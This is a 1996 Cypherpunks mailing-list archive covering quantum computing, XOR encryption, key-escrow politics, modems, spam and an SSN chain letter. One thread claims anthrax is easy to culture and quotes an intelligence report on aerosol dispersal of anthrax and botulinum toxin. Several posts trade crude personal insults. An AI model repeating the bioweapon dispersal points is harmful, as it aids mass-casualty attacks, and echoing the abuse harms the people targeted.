- http://www.thecodex.com From osborne at gateway.grumman.com Wed Sep 18 04:48:30 1996 From: osborne at gateway.grumman.com (Rick Osborne) Date: Wed, 18 Sep 1996 19:48:30 +0800 Subject: Quantum Computers Message-ID: <3.0b16.32.19960918050947.00539aa0@gateway.grumman.com> I rather enjoyed this article, especially the part about: >It gets even wilder, because the quantum mechanical state of the >matter in the machine's memory determines the output, Seth Lloyd >of MIT thinks you could run the machine in reverse and the result >would be a quantum mechanical micromanipulator. This was great! So where do we plug in the nice hot cup of tea? ;^) I'm sorry if I seem to be making light of a very serious topic, but, last time I checked, computers don't have a reverse. Spam me, flame me, whatever, but as far as I know, the universe only goes in one direction. It's just a rehash of the old sci-fi dramas about building a computer that goes on and builds a smarter computer, ad infinitum. That's one of the problems of non-sentient things: they can't grasp anything beyond their scope. But, for argument's sake, let's assume: 1. This quantum computer, which looks startlingly like my HP48, has a slider labeled: FORWARD -- STOP -- REVERSE And the slider actually works. 2. We are working with a finite-state quantum computer (say 32 qbits worth). 3. There is NO error introduced into the system from any source, including itself. Okay, so I turn my little QC48 on, just to set a state, and then slam the slider into REVERSE. AT this point, it fizzles and dies. Why? Because of the same reason you can't just put the DES algorithm 'in reverse': the quantum equivalent of s/p-boxes. What am I talking about? I'm talking about a QUANTUM COMPUTER here. Remember it's greatest asset? It does every calculation at once. This is exactly why you can't go backwards. You have nowhere to go, because you have EVERYWHERE to go. Because at each 'quantum tick' of the 'quantum clock' EVERY possible operation is going on, each state has the possibility of leading to every other state. Now, let's throw out assumption #3, and deal with a slightly more realistic version of my QC48, the QC48SX. Because we're dealing with a computer that produces error in it's own system, the error is going to be relatively hard to keep track of. Notice that the error-correction schemes listed don't eliminate error, they just help thin it out. So you've got your result to the operation you just performed: OP1 + OP2 + OPERR = RESULT The error-correction protocol makes OPERR small, but it doesn't eliminate it. So this is when I throw it into reverse. (Sure, I could have kept track of all my operations up to that point and trace back along them with no problem, but I can only do that until the point at which I turned on my QC48SX, so let's just assume I didn't keep track.) I've got RESULT now, and with a reasonable degree of accuracy, I can statistically figure out what two states led up to that point, with a margin of error STATERR. This is made even tougher by the fact that there was an error (OPERR) in the system to begin with. Remember now, every state can lead to every other state, but let's assume we've got NSA-level statisticians here, and STATERR is relatively small. You now have STATERR*OPERR working against you. This is where working in a finite-state machine is good, as it keeps these values relatively small. But they are still there. These errors, in combination with the quantum-s/p-box factor, precludes you from going backwards with any degree of reliability. Like I said, I'm not trying to tear down anyone hopes and ideas, I just want to introduce a little *reality* into our system. ____________________________________________________________ Rick Osborne osborne at gateway.grumman.com "Yes, evil comes in many forms, whether it be a man-eating cow or Joseph Stalin, but you can't let the package hide the pudding! Evil is just plain bad! You don't cotton to it. You gotta smack it in the nose with the rolled-up newspaper of goodness! Bad dog! Bad dog!" - The Tick From bdurham at metronet.com Wed Sep 18 04:58:15 1996 From: bdurham at metronet.com (Brian Durham) Date: Wed, 18 Sep 1996 19:58:15 +0800 Subject: Redundancy in XOR encryption Message-ID: <323F94D1.EC0@metronet.com> An embedded message was scrubbed... From: unknown sender Subject: no subject Date: no date Size: 2801 URL: From azur at netcom.com Wed Sep 18 05:07:15 1996 From: azur at netcom.com (Steve Schear) Date: Wed, 18 Sep 1996 20:07:15 +0800 Subject: Fear of Flying -- from HotWired Message-ID: >On Tue, 17 Sep 1996, Adamsc wrote: > >> On Thu, 12 Sep 1996 12:03:18 -0700, Bill Frantz wrote: >> >> >>... former CIA director James Woolsey: responded with some seemingly >> >> gratuitous anti-Net >> >> rhetoric. Terrorists may use biological weapons like anthrax, he said. >> >> "Anthrax is colorless, odorless, and has a 90 percent lethality. One >> >> gram has 100 million lethal doses." Then Woolsey delivered the zinger: >> >> "The knowledge of how to make anthrax is widely available, including >> >> on the Internet." >> >> >Gee, biotech has come a long way. Now I can download the Anthrax DNA >> >sequence from the net and insert it in some carrier bacteria and start >> >making Anthrax bacteria. Neat! > >Culturing and growing anthrax is painfully simple. No DNA required. > >> >BTW - My dictionary says that Anthrax is primarily an animal disease which >> >only occasionally infects humans. It sounds like a poor choice for bio-war >> >terror. > >Incorrect. It is highly problematic and very nasty when it is properly >delivered. The hardest thing about anthrax is to get an areosol fine >enough to present an inhalation risk. (This is why it does not >generally cause problems in humans- it's rare for it to get this fine). > Why not learn from the pros: IRAQI BIOLOGICAL WARFARE [BW) DEVELOPMENTS Filename:0119pgv.00p [ (b)(2) ] [ (b)(2) ] SUBJ: IRAQI BIOLOGICAL WARFARE [BW) DEVELOPMENTS 1. [ (b)(1) sec 1.3(a)(4) ] IRAQ ACQUIRED FORTY HIGH PERFORMANCE AEROSOL GENERATORS IN THE SPRING OF' 1990 OSTENSIBLY FOR SPRAYING CROPS WITH PESTICIDES. THE GENERATORS WERE CUSTOM BUILT TO DELIVER EITHER LIQUID OR DRY MATERIAL EITHER SIGNLY OR SIMULTANEOUSLY. THE GENERATORS CAN DISTRIBUTE FIFTY LITERS PER MINUTE [3-,0O0 LITERS PER HOUR OR APPROXIMATELY 800 GALLONS PER HOUR) THROUGH A CUSTOM DESIGNED NOZZLE[S] WHICH PERMITS THE AEROSOL TO BE ADJUSTED TO TEN DIFFERENT PARTICLE SIZES. THE DISSEMINATION OUTLET CAN BE ROTATED ONE HUNDRED AND EIGHTY DEGREES THEREBY ENABLING DISSEMINATION HORIZONTAL TO GROUND OR WATER SURFACES, OR UPWARDS AT AN ANGLE PERMITTING PREVAILING WINDS TO CARRY THE AEROSOL. THE IRAQI ENTITY WHICH ACQUIRED THE AEROSOL GENERATORS IS NOT KNOWN AT THIS TIME BUT COULD VERY WELL BE CONNECTED TO THE IRAQI BIOLOGICAL [ (b)(2) ] WARFARE BW PROGRAM. 2. THE AEROSOL GENERATORS ARE OF SUCH--SIZE TO FIT ON THE BACK OF A PICKUP TRUCK OR A SMALL ALL-TERRAIN VEHICLE, A SMALL BOAT, OR SMALL AIRCRAFT. THESE UNITS WOULD BE SUITABLE FOR THE DISPERSAL OF BW AGENTS IN EITHER LIQUID OR DRY FORM. THE ABILITY TO DISPENSE SIMULTANEOUSLY TWO BW AGENTS AT THE SAME TIME. SUCH UNITS, HOWEVER, WOULD THEMSELVES BECOME HEAVILY CONTAMINATED DURING USE AND WOULD REQUIRE DECONTAMINATION TO RENDER THEM SAFE. PERSONNEL OPERATING SUCH UNITS WOULD AT A MINIMUM NEED TO WEAR A PROTECTIVE OVERGARMENT A CHEMICAL AND BIOLOGICAL WARFARE MASK, AND UNDERGO THOROUGH DECONTAMINATION AFTER DISPENSING THE AGENT(S) . DECONTAMINATION OF THE AEROSOL GENERATORS AND TRANSPORT VEHICLES WOULD LIKELY HAVE TO ACCUR NEAR THE AREA OF OPERATION AT REMOTE LOCATIONS SO AS TO MININIZE INCIDENTAL CONTAMINATION OF IRAQI FORCES. 3. THE IRAQIS HAVE TWO CONFIRMED BW AGENTS--ANTHRAX AND BOTULINUM TOXIN. ANTHRAX CAN BE4 DISSEMINATED BY AEROSOL GENRATORS EITHER AS A FREEZE-DRIED POWDER OR AS A LIQUID SUSPENSION. THEORETICALLY BOTULINIUM TOXIN CAN BE DISPENSED AS EITHER A FREZE-DRIED POWDER, PROBABLY IN COMBINATION WITH A FILLER, OR AS A LIQUID. THE MORE LIKELY OF THE TWO CHOICES FOR BOTULINUM TOXIN IS DISSEMINATION AS A POWDER. POWDERS ARE EASILY MIXED WITH FILLERS, POSE A CONSIDERABLY GREATER THREAT THROUGH INHALATION, AND ARE BETTER ABLE TO WITHSTAND THE SHEAR FORCES EXPERIENCED WHEN DISSEMINATED THROUGH NOZZLES WITH A RELATIVELY SMALL ORIFICE. PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Snoop Daty Data | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- Just say NO to perscription DRUGS. From paul at fatmans.demon.co.uk Wed Sep 18 05:12:19 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Wed, 18 Sep 1996 20:12:19 +0800 Subject: Redundancy in XOR encryption Message-ID: <842988795.23113.0@fatmans.demon.co.uk> > > > > Compress P to get perfect compression (ie. 0 redundancy) > > Encrypt F (the compressed text) using a repeated key XOR > > > > of course this is all rather theoretical as there is no such thing as > > perfect compression, but I just thought it might be interesting to > > see if this is indeed strong, superficially it appears so to me... > > > > Paul: > I think that if the cryptanalyst knows that F has zero redundancy > that he can run searches from 0 to n bits for the key and have > the computer flag solutions that have zero redundancy. I never though of that. > I also think that a perfectly compressed file would have a relative > entropy value close to one also, hence the computer could flag possibles > that have both characteristics. yeah, these two are reasonably unlikely to occur together (only a reasoned guess, anyone got any comments on this?) so we really have a weakish system. > Hence, instead of searching for plaintext by counting coincidences, > we are searching the decrypts for solutions that have zero redundancy > and a relative entropy value close to one. How many solutions will > have both these qualities? I don't know. But if the compression method > is known, brute force will be tried, and only having to try to > decompress (read) data that has the resultant characteristics > of compressed information will speed things up by quite a bit. Yeah, this is still a form of brute force but I was thinking of this in terms of a smallish (sub 200 bit) key, so brute force against solutions with 0 entropy is a realistic possibility. anyone else got a faster way to attack this highly theoretical, will-never-be-implemented, type system?? I`d imagine there is some sort of way to measure the entropy "mixed in" by the XOR thus giving a foothold in the key, but I can`t think of anything right now, anyone got any ideas? Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ 9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi mUqFH41Z7NkyO8ZFdi5GGX0= =CMZA -----END PGP PUBLIC KEY BLOCK----- From enzo at ima.com Wed Sep 18 05:13:14 1996 From: enzo at ima.com (Enzo Michelangeli) Date: Wed, 18 Sep 1996 20:13:14 +0800 Subject: Wealth Tax vs. Capital Gains Tax Reduction In-Reply-To: <323F13CA.7523@netscape.com> Message-ID: Such kind of wealth tax would likely trigger a major sell-off of stocks, both because holding them would no longer defer taxation, and also for raising the liquidity necessary to pay the tax. That could potentially cause a stockmarket crash, and upset a lot of electors. I hope that U.S. Congress and government be aware of that. Enzo On Tue, 17 Sep 1996, Thomas Dell wrote: > > Needless to say, I despise the idea of a "wealth tax," and I can > > see various loopholes and workarounds. I'd also expect a lot of > > folks to simply move out of the country if this were to happen. > > Not without difficulty. While this is not from a reliable source, > it does seem that the gov't is aware of this issue. > > Tom > > tdell at netscape.com [...] From gbroiles at netbox.com Wed Sep 18 06:26:30 1996 From: gbroiles at netbox.com (Greg Broiles) Date: Wed, 18 Sep 1996 21:26:30 +0800 Subject: Eudora 3.0 supports multiple tentacles Message-ID: <3.0b19.32.19960918034112.006e3598@pop.ricochet.net> Those of you who have or are tentacles (hee, hee) might take a look at the new Eudora 3.0 beta; it's got nice built-in support for multiple POP mailboxes/usernames, and keeps track of which identity received a messages, and sends replies from that identity (using the appropriate outbound SMTP server) so as not to confuse correspondents. It seems to be ideally set up for people who want to adopt an alternate nym for whatever reason. The filtering is also allegedly improved but I haven't fussed with that much yet. -- Greg Broiles | "We pretend to be their friends, gbroiles at netbox.com | but they fuck with our heads." http://www.io.com/~gbroiles | | From gbroiles at netbox.com Wed Sep 18 07:14:48 1996 From: gbroiles at netbox.com (Greg Broiles) Date: Wed, 18 Sep 1996 22:14:48 +0800 Subject: The GAK Momentum is Building... Message-ID: <3.0b19.32.19960918032950.007163ac@pop.ricochet.net> >>However, making the government a _required_ part of such plans implies a >>motive that is not at all the same as what companies wish (mostly, >>disaster recovery). > >the distinction lies in the terminology. what does it mean, "required >part of the plan". if it essentially amounts to nothing more than >the government saying, "you must give us keys when we present you >with a subpoena/warrant", then that's no different than the system >we have today. Hmm. The government sure is putting a lot of effort into moving us to a system that you say is "no different than the system we have today." As far as I can tell, you're the only one who thinks that. The government thinks that GAK is a big change, civil libertarians think GAK is a big change .. but you're welcome to call it "status quo" if it suits you. There's a world of difference between the government subpoena-ing something from me, where I can delay disclosure until I've exhausted my legal avenues to challenge disclosure, and the government demanding data from an at best disinterested third party who cares not at all if I get my day in court before they disclose. With the second scenario, I'm forced to try to "unring the bell", and somehow limit the spread of otherwise private/confidential data in a community (law enforcement) which is organized to collect and retain information. Ha, ha. Given today's Congress and Supreme Court, there's probably precious little chance that keys disclosed prematurely or erroneously won't be used to collect evidence which will be admissible despite the lack of meaningful opportunity to challenge the "recovery" of a key. -- Greg Broiles | "We pretend to be their friends, gbroiles at netbox.com | but they fuck with our heads." http://www.io.com/~gbroiles | | From gary at systemics.com Wed Sep 18 08:36:55 1996 From: gary at systemics.com (Gary Howland) Date: Wed, 18 Sep 1996 23:36:55 +0800 Subject: SSN database scam? Message-ID: <323FDB5E.500F9F30@systemics.com> Forwarded from www-security mailing list. Gary -- "Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown. pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 To: www-security at ns2.rutgers.edu Subject: Can you say "fraud"? (fwd) From: Mary Irene Wise Date: Tue, 17 Sep 1996 08:44:39 -0400 (EDT) Sender: owner-www-security at ns2.rutgers.edu This is probably a bit off-topic; if so I apologize. Can anybody comment on the item forwarded below my sig file? It claims there's a database w/ people's credit card no's etc on it and you have to give your name and social security number to get off of it. This strikes me as being a scam to get your ssn, but this went around at work and people are actually calling and giving it out. I know ssn's aren't really as secure as they're supposed to be, but still... So, does anybody know if this database is for real or if it's just a scam? TIA, Mary Wise --------------------------------- *** ------------------------------------ Mary Wise | Computer Systems Specialist * auntyem at umich.edu LSA Information Technology | homepage not availabe at this time 3557 LSA Bldg 1382 * University of Michigan | (313) 647-6230 * | --------------------------------- *** ------------------------------------ ---------- Forwarded message ---------- > > > Your name, social security number, current address, previous addresses, > mother's maiden name, birth date and other personal information > are now available to anyone with a credit card through a new Lexis database > called P-Trax. As I am sure you are aware, this information > could be used to commit credit card fraud or otherwise allow someone else to > use your identity. > > You can have your name and information removed from this list by making a > telephone request. Call (800)543-6862, select option 4 and > then option 3 ("all other questions") and tell the representative answering > that you wish to remove your name from the P-trax database. You > may also send a fax to (513) 865-7360 or 865-1930. Include your full name and >ssn in the fax. You can also send physical mail to > > LEXIS-NEXIS > P.O. Box 933 > Dayton, Ohio 45401-0933. > > Sending physical mail to confirm your name has been removed is always > a good idea. > > As word of the existence of this database has spread on the net, Lexis-Nexis > has been inundated with calls, and has set up a special set of > operators to handle the volume. In addition, Andrew Bleh (rhymes with > "Play") is a manager responsible for this product, and is the person > to whom complaints about the service could be directed. He can be reached at > the above 800 number. Ask for extension 3385. According to > Lexis, the manager responsible is Bill Fister at extension 1364. > > I called this morning and had my name removed. The representative will > need your name and social security number to remove you from the list. > I suggest that we inundate these people with requests to remove our > info from the list and forward this e-mail to everyone we know. > > >----- End Included Message ----- > > > >Cheers . . . > >"The backup procedure works fine, but the restore is tricky!" >_____________________________________________________________________________ > | _ \ Amanul Haque > | | \ \ Pencom System Administration > | |_/__/__ __ 9050 Capital of Texas Highway North, Austin, TX 78759 > | _/ ___/| \ Email: ahaque at pencom.com > | | \___ \| \ \ Pager: (708) 643-7331 > |__| /____/|_|__\___________________________________________________________ > Pencom Web Page : http://www.pencom.com > > > >------------- End Forwarded Message ------------- > > > > > -=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- Nancy L. Cassidy University of Michigan LS&A Budget & Finance Team 2557 LSA Bldg. 1382 Tel: (313) 764-6465 Fax: (313) 764-2697 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- From dlv at bwalk.dm.com Wed Sep 18 08:47:12 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 23:47:12 +0800 Subject: A Bizarre Increase in the Ad Hominems Here In-Reply-To: Message-ID: tcmay at got.net (Timmy May) (fart) writes: > * Detweiler (vznuri at netcom.com) writes: Detweiler is much smarter than VZNuri (or Timmy). I don't think Timmy believes his own lies. > (Sadly, a large fraction of the women who have posted on our list have > written in this same kind of incoherent, rambling, makes-no-sense kind of > style. I have no idea why the percentage of such events is so high.) Is Timmy gay? Why does he hate women so much? > * And of course Vulis has been posting his "farting" messages far and wide. Recently, 3 people in the computer security field have independently told me that Timmy May approached them "off-list" to complain about things I supposedly say on the Internet - most of which I never said. When I asked about it on this mailing list, Timmy posted what was shown to be a lie (about his complaint to Kelly Goen.) Timmy is known as a nutcase and a liar - if he keeps up his "character assassination" attacks, the only reputation he hurts is his own. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From DMiskell at envirolink.org Wed Sep 18 09:12:15 1996 From: DMiskell at envirolink.org (Daniel Christopher Miskell) Date: Thu, 19 Sep 1996 00:12:15 +0800 Subject: A daily warning regarding Timothy C. May Message-ID: >Timothy C. May is a lying sack of shit. Right. And you had to insult him through use of anonymous mail. Boy, you're real brave, shedding the light to the rest of the cypherworld in such a manner. Apologies for the spam, but there was no address, obviously. -- If in fact we are the only intelligent life on this planet, why the fuck are we in this goddamn mess? -- Find my public key on the World Wide Web -- point your browser at: http://bs.mit.edu:8001/pks-toplev.html From nobody at cypherpunks.ca Wed Sep 18 09:35:05 1996 From: nobody at cypherpunks.ca (John Anonymous MacDonald) Date: Thu, 19 Sep 1996 00:35:05 +0800 Subject: The daily warning about Timmy May, the lying sack of shit Message-ID: <199609181221.FAA30299@abraham.cs.berkeley.edu> Timmy May proves that the Midwestern gene pool needs some chlorine in it. From declan at eff.org Wed Sep 18 09:44:50 1996 From: declan at eff.org (Declan McCullagh) Date: Thu, 19 Sep 1996 00:44:50 +0800 Subject: The GAK Momentum is Building... In-Reply-To: Message-ID: On Tue, 17 Sep 1996, Timothy C. May wrote: > > (BTW, I predict that the tainted term "key escrow" is now gone from the > official lexicon. I haven't seen the Clipper IV proposal, but I surmise > that the baggage the term "key escrow" carries means that some more > benign-sounding term will be used in the final proposal. Something like > "Key Recovery System." You heard it here.) I agree, of course. But Gore's office has been telling me about the "Key Recovery System" for months. It's nothing new in the DC cryptolexicon. -Declan // declan at eff.org // I do not represent the EFF // declan at well.com // From pjb at ny.ubs.com Wed Sep 18 09:46:25 1996 From: pjb at ny.ubs.com (pjb at ny.ubs.com) Date: Thu, 19 Sep 1996 00:46:25 +0800 Subject: 56 kbps modems Message-ID: <199609181248.IAA06860@sherry.ny.ubs.com> if nothing else, the availability of 56kbps on an analog line might get the telcos to bring the isdn prices down to some reasonable level, which at the moment, it is not, at least not in nyc. -paul > From cypherpunks-errors at toad.com Tue Sep 17 18:21:03 1996 > From: Adamsc at io-online.com (Adamsc) > To: "Bill Stewart" , > "cypherpunks at toad.com" > Cc: "Asgaard" , "Enzo Michelangeli" > Date: Tue, 17 Sep 96 12:22:15 -0800 > Reply-To: "Chris Adams" > Priority: Normal > X-Mailer: Chris Adams's Registered PMMail 1.52 For OS/2 > Mime-Version: 1.0 > Content-Type> : > text/plain> ; > charset="us-ascii"> > Content-Transfer-Encoding: 7bit > Subject: Re: 56 kbps modems > Sender: owner-cypherpunks at toad.com > Content-Length: 1107 > > On Sun, 15 Sep 1996 01:31:19 -0700, Bill Stewart wrote: > > >and still get the original 56kbps back out. But if they can, well, > >yee-hah, ISDN is nearly dead :-) (Not totally dead; the signalling is > >still useful for some applications, the convenience of two channels on > >one wire pair is nice, and the fact that people can get 56kbps without > Also, can't you add ISDN b-channels ? (I.e. get another 64kps channel) > >the phone company's help will pressure them into offering ISDN for > >a lower price in areas where the Phone Company's idea of "all the market > >will bear" is substantially higher than voice pricing.) > > ISDN is more elegant; this sounds like a 'kludge' of sorts. OTOH, we've all > seen how well a cheap kludge can do, right? > > # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp > # cadams at acucobol.com | V.M. (619)515-4894 > "I have never been able to figure out why anyone would want to play games on > a computer in any case when the whole system is a game. Word processing, > spreadsheets, telecoms -- it's all a game. And they pay you to play it." > -- Duncan Frissell > > > From liberty at gate.net Wed Sep 18 09:55:10 1996 From: liberty at gate.net (Jim Ray) Date: Thu, 19 Sep 1996 00:55:10 +0800 Subject: The GAK Momentum is Building... Message-ID: <199609181251.IAA118254@osceola.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: cypherpunks at toad.com Date: Wed Sep 18 08:48:43 1996 Tim May wrote: <...> > (BTW, I predict that the tainted term "key escrow" is now gone from the > official lexicon. I haven't seen the Clipper IV proposal, but I surmise > that the baggage the term "key escrow" carries means that some more > benign-sounding term will be used in the final proposal. Something like > "Key Recovery System." You heard it here.) I agree, and hope so. "Key Recovery," while not as Orwellian-sounding as "GAK," is a step on the path to honesty WRT the English language, though it's important to continually point out, as Tim did in his post, that *access* -- rather than just recovery -- is obviously what Mr. Freeh wants. I'd count this likely change in terminology as a "cypherpunk victory," albeit a very small and certainly a very hard-fought one. JMR Regards, Jim Ray -- DNRC Minister of Encryption Advocacy "As govt.s grow arithmetically, corruption grows exponentially." -- Ray's Law of official corruption. Defeat the Duopoly! Stop the Browne out. Harry Browne for President. Jo Jorgensen for Vice-president. http://www.HarryBrowne96.org/ http://www.twr.com/stbo ___________________________________________________________________ PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 I will generate a new (and bigger) PGP key-pair on election night. http://www.shopmiami.com/prs/jimray ___________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMj/vsG1lp8bpvW01AQFkhwP/XEkJkdXwYsdSM8kn+B3bR/bCDXaKgkIE p63RgjQ5C60byufXqlqitvuJPMuS19MRxlF7UXsXJXKY6Jm92Q45sQtLICsMqXhP /iJwDVYaEuDj24cFycsZjZMeT+xxnuy+OCuhKIEgKF6gjh2uEZxbCellCqJ86TPF XfPiQiTPBDo= =B2hR -----END PGP SIGNATURE----- From roy at sendai.scytale.com Wed Sep 18 09:55:35 1996 From: roy at sendai.scytale.com (Roy M. Silvernail) Date: Thu, 19 Sep 1996 00:55:35 +0800 Subject: Anthrax on the 'net [Was Re: Fear of Flying -- from HotWired ] In-Reply-To: Message-ID: <960918.071638.9e0.rnr.w165w@sendai.scytale.com> -----BEGIN PGP SIGNED MESSAGE----- In list.cypherpunks, tcmay at got.net writes: > > At 9:14 PM 9/17/96, Mike Fletcher wrote: > >> The Frank Herbert (of _Dune_ fame) book _White Plague_ comes >>to mind. Basically a molecluar biologist's wife and kids are killed >>by an IRA bomb while visiting Dublin. He snaps and creates a plague >>which kills women (men are carriers) as revenge. All without using >>that nasty Internet (in fact, the book was written back before even >>ARPAnet). > > A _very_ minor correction. My copy of "The White Plague" is not handy, but > I distinctly recall reading it circa 1980-1, certainly no earlier than > 1977-8. Right you are, Tim. From the Minneapolis Public Library online catalog: | AUTHOR: Herbert, Frank. | TITLE: The white plague / Frank Herbert. | EDITION: 1st ed. | IMPRINT: New York : Putnam, 1982. | CALL NO.: SCIENCE FICTION | PHYSICAL FEATURES: 445 p. ; 24 cm. | LC CARD NO.: 82-7586 | ISBN/ISSN: 0399127216 : | OCLC NO.: 08432222 > But of course I agree that "The White Plague" was written long before "The > Net" became a household name. (Interestingly, Herbert was > computer-literate, and he even wrote a book about using PCs, circa the late > 70s....something like "Nailing Jelly to a Tree.") As long as I'm skulking about the library.... AUTHOR: Herbert, Frank. TITLE: Without me you're nothing : the essential guide to home computers / Frank Herbert, with Max Barnard. IMPRINT: New York : Simon and Schuster, c1980. CALL NO.: QA76.5.H46 PHYSICAL FEATURES: 304 p. : ill. ; 25 cm. OTHER AUTHORS: Barnard, Max, SUBJECTS: Microcomputers. * Minicomputers. LC CARD NO.: 80-22315 ISBN/ISSN: 0671412876 OCLC NO.: 06761235 - -- Roy M. Silvernail [ ] roy at scytale.com PGP Public Key fingerprint = 31 86 EC B9 DB 76 A7 54 13 0B 6A 6B CC 09 18 B6 Key available from pubkey at scytale.com -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMj/pYxvikii9febJAQG4oAP/dJCJ5VO6w3fed5S3XgcyY2phm00G1uFg PkOdWTMf3Qsom6tciXOrJ9XNv5YStpXq7FFoz0jcHpbicpK6kMvevbrctinLu3GN M576EomA1iC3RPqn4Pw5D0kuv0JP9sU/egvIw2oOR7auul0Hdl1tZ8qoeejnIdRv XpfOyrxC6vk= =OlkL -----END PGP SIGNATURE----- From schmidt at pin.de Wed Sep 18 10:07:41 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Thu, 19 Sep 1996 01:07:41 +0800 Subject: SPAMS Message-ID: Hi, please focus on the UPPER written text at the bottom. I think they take it _much_ to easy. -stephan ---------- Forwarded message ---------- Date: Sun, 15 Sep 1996 17:55:57 +0000 From: Mailer To: LISCIFI at AOL.COM Subject: Hi! Pardon the intrusion. Market study shows this may be of interest to you. If you have received this message in error, please hit delete. *********************************************************** A Personal Invitation Stop working for someone else! Put yourself in a position to leave the 9-5 grind behind!!! We invite you to listen to the most extraordinary and most powerful wealth building opportunity in the world and within a few minutes you will actually hear: * How you can make profits of $10,000 within the next 30 days! * You never have to leave your home! * A financial strategy 100 times more powerful than MLM or ANY OTHER BUSINESS! * Where you are paid directly and daily! (Don't wait for a company to pay you!) This is not MLM! This is not a pipe dream! This is a real business venture! 800-995-0796 Ext 9263. ************************************************************** ANY EMAIL ADDRESS PUBLISHED ON THE INTERNET THAT INVITES COMMERCIAL SOLICITATIONS IS DEEMED AS A COMMERCIAL ADDRESS, AND AS SUCH IS ELIGABLE FOR ETHICAL AND LEGAL EMAIL SOLICITATIONS FROM DIRECT ELECTRONIC MAIL MARKETERS. IF FOR ANY REASON YOU OBJECT TO RECEIVING THIS MESSAGE PLEASE POLITELY REQUEST REMOVAL FROM MY LIST BY CLICKING ON THE REPLY BUTTON AND ENTERING "REMOVE" IN THE SUBJECT LINE. IF YOU DO NOT DO SO, I MUST ASSUME YOU WISH TO RECEIVE FURTHER MAILINGS. From wb8foz at nrk.com Wed Sep 18 10:09:21 1996 From: wb8foz at nrk.com (David Lesher) Date: Thu, 19 Sep 1996 01:09:21 +0800 Subject: PGP in the workplace In-Reply-To: Message-ID: <199609181244.IAA26798@nrk.com> > At 3:20 AM 9/18/96, Rick Osborne wrote: > >Upon explaining to them that I was simply trying to make sure of my own >security....... I agree, send this to Scott Adams. -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From declan at eff.org Wed Sep 18 10:27:56 1996 From: declan at eff.org (Declan McCullagh) Date: Thu, 19 Sep 1996 01:27:56 +0800 Subject: The GAK Momentum is Building... In-Reply-To: <199609180338.UAA27100@netcom15.netcom.com> Message-ID: On Tue, 17 Sep 1996, Vladimir Z. Nuri wrote: > [business key management plans/infrastructures] > >However, making the government a _required_ part of such plans implies a > >motive that is not at all the same as what companies wish (mostly, disaster > >recovery). > > the distinction lies in the terminology. what does it mean, "required > part of the plan". if it essentially amounts to nothing more than > the government saying, "you must give us keys when we present you > with a subpoena/warrant", then that's no different than the system > we have today. again, granted, laws specifically aimed at crypto > can tend to take up a life off their own. but my main point was > that the gloom-and-doom peddled by you and lucky green over clipper > just doesn't mesh with the actual events. the government has > visibly had to *backpeddle* *numerous* times in all of its > clipper proposals. I see no evidence that the latest proposals > are going to be any different. what annoys me is people who are > crying wolf all the time, and even when it seems there are no > wolves around, or they have temporarily receded, > they say, "I told you so". "the wolves really are going to > devour you, just you wait and see" Perhaps I'm missing something here. If a key recovery infrastructure is required, let it develop free of government coercion and intervention. Let the free market develop it. If the KRI is indeed free, the Feds won't have any problems with us escrowing keys in Switzerland or Belize, will they? The White House is not backpedaling as much as trying other attacks. Like having Clinton call wavering Democratic senators on Senate Commerce and reminding them of their political obligations to him in an election year. And like the government-mandated key recovery infrastructure. The fight is anything but over. -Declan // declan at eff.org // I do not represent the EFF // declan at well.com // From adam at homeport.org 